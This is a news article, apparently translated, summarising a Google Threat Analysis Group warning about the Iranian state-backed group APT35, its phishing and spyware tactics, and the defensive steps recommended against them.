The Threat Analysis Group (TAG), a group aimed at preventing targeted attacks on Google services, has issued an official warning against the Iranian government-backed hacker organization APT35. In this official warning, TAG explains the methods APT35 used.
According to TAG, APT35 is a hacker group that has been spying for the benefit of the Iranian government, and recently attacked the authentication station with the email address of an election official during the 2020 US presidential election.
In early 2021, APT35 launched an attack by hacking a website affiliated with a UK university and sending an email asking them to attend a fake online seminar. To attend this fake online seminar, they requested a two-step verification code sent to a device that required authentication information, such as a Google account or Microsoft account.
According to TAG, APT35 has been attacking in the same way since around 2017, and it is said that the target of the attack is government institutions, academic institutions, media companies, NGOs, etc.
In May 2020, TAG discovered that APT35 was attempting to upload spyware to the Google Play Store. The spyware they were trying to upload disguised as VPN software and installed to steal sensitive information such as the contents of calls and text messages, contacts, and location information. The VPN software was immediately detected and removed from the Google Play Store before user installation, but in July 2021, it was said that they tried to distribute similar apps on application distribution platforms other than the Google Play Store.
One of the most prominent features of APT35 by TAG is the spoofing of conference officials. APT35 attacked by sending an email about a live Italian conference and sending an email containing a phishing link if the user responded. According to TAG, clicking the link in the second email will redirect you to your fishing domain. It is said that a URL shortening service is used to disguise APT35 URLs, and among them, a method of redirecting to a phishing site by disguising a Google form is said to be used.
One of the novel methods APT35 does is to use Telegram, a personalized SNS. APT35 selected IP and locale when sending messages indiscriminately through public channels, including JavaScript phishing pages, which notify when a Telegram page is loaded.
TAG reports to Telegram the bot APT35 used to send the message, and Telegram has already deleted the bot. The TAG is encouraging administrators to take attack alert notifications seriously, participate in advanced protection programs, and use two-factor authentication. Related information can be found here.
Add comment